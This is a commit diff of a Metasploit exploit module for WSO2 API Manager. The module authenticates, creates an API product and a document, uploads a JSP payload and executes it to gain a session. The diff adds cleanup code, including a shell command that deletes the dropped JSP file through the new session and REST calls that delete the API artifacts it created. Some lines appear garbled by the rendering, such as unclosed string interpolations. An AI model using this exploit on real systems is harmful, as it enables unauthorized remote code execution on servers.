@@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote
77 Rank = ExcellentRanking
88
99 include Msf ::Exploit ::Remote ::HttpClient
10- include Msf ::Exploit ::FileDropper
1110 prepend Msf ::Exploit ::Remote ::AutoCheck
1211
1312 attr_accessor :bearer
@@ -275,7 +274,7 @@ def create_api
275274 end
276275
277276 def create_product_api
278- api_id = create_api [ 'id' ]
277+ @ api_id= create_api [ 'id' ]
279278
280279 product_api_data = {
281280 'name' => Faker ::App . name ,
@@ -284,7 +283,7 @@ def create_product_api
284283 'apis' => [
285284 {
286285 'name' => '' ,
287- 'apiId' => api_id ,
286+ 'apiId' => @ api_id,
288287 'operations' => [ ] ,
289288 'version' => '1.0.0'
290289 }
@@ -304,6 +303,8 @@ def create_product_api
304303
305304 fail_with ( Failure ::UnexpectedReply , 'Failed to create API Product' ) unless res &.code == 201
306305
306+ @api_created = true
307+
307308 print_good ( 'API Product created successfully' )
308309
309310 return res . get_json_document
@@ -357,7 +358,7 @@ def upload_payload(api_id, doc_id)
357358 fail_with ( Failure ::UnexpectedReply , 'Payload upload attempt failed' ) unless res &.code == 201
358359
359360 print_good ( 'Payload uploaded successfully' )
360- register_file_for_cleanup ( jsp_filename )
361+
361362 return res
362363 end
363364
@@ -380,19 +381,72 @@ def exploit
380381 authenticate unless bearer
381382 api_avaliable = list_product_api
382383 api_avaliable . each do |product_api |
383- doc_id = create_document ( product_api [ 'id' ] )
384- next unless doc_id
384+ @product_api_id = product_api [ 'id' ]
385+ @doc_id = create_document ( @product_api_id )
386+ next unless @doc_id
385387
386- res = upload_payload ( product_api [ 'id' ] , doc_id )
388+ res = upload_payload ( @product_api_id , @ doc_id)
387389 if res &.code == 201
388390 execute_payload
389391 break
390392 end
391393 end
392394 end
393395
396+ def on_new_session ( session )
397+ super
398+ # Registering for cleanup doesn't work as the file is not placed in the CWD, and the WSO2_SERVER_HOME might vary
399+ session . shell_command_token ( "rm -rf $WSO2_SERVER_HOME/repository/deployment/server/webapps/authenticationendpoint/#{ jsp_filename } )
400+ end
401+
402+ def cleanup
403+ return unless session_created?
404+
405+ super
406+
407+ # If we have created the API, we need to delete it; thus the documentation
408+ return delele_product_api && delele_api if @api_created
409+
410+ # If the API was already there, we deleted only the documentation.
411+ delete_document
412+ end
413+
394414 def jsp_filename
395415 @jsp_filename ||= "#{ rand_text_alphanumeric ( 8 ..16 ) }
396416 end
397417
418+ def delete_document
419+ res = send_request_cgi (
420+ 'uri' => normalize_uri ( target_uri . path , '/api/am/publisher/' , target . opts [ 'api_version' ] , '/api-products/' , @api_id , '/documents/' , @doc_id ) ,
421+ 'method' => 'DELETE' ,
422+ 'headers' => {
423+ 'Authorization' => "Bearer #{ bearer }
424+ }
425+ )
426+
427+ return res &.code == 200
428+ end
429+
430+ def delele_api
431+ res = send_request_cgi (
432+ 'uri' => normalize_uri ( target_uri . path , '/api/am/publisher/' , target . opts [ 'api_version' ] , '/apis/' , @api_id ) ,
433+ 'method' => 'DELETE' ,
434+ 'headers' => {
435+ 'Authorization' => "Bearer #{ bearer }
436+ }
437+ )
438+ return res &.code == 200
439+ end
440+
441+ def delele_product_api
442+ res = send_request_cgi (
443+ 'uri' => normalize_uri ( target_uri . path , '/api/am/publisher/' , target . opts [ 'api_version' ] , '/api-products/' , @product_api_id ) ,
444+ 'method' => 'DELETE' ,
445+ 'headers' => {
446+ 'Authorization' => "Bearer #{ bearer }
447+ }
448+ )
449+ return res &.code == 200
450+ end
451+
398452end
0 commit comments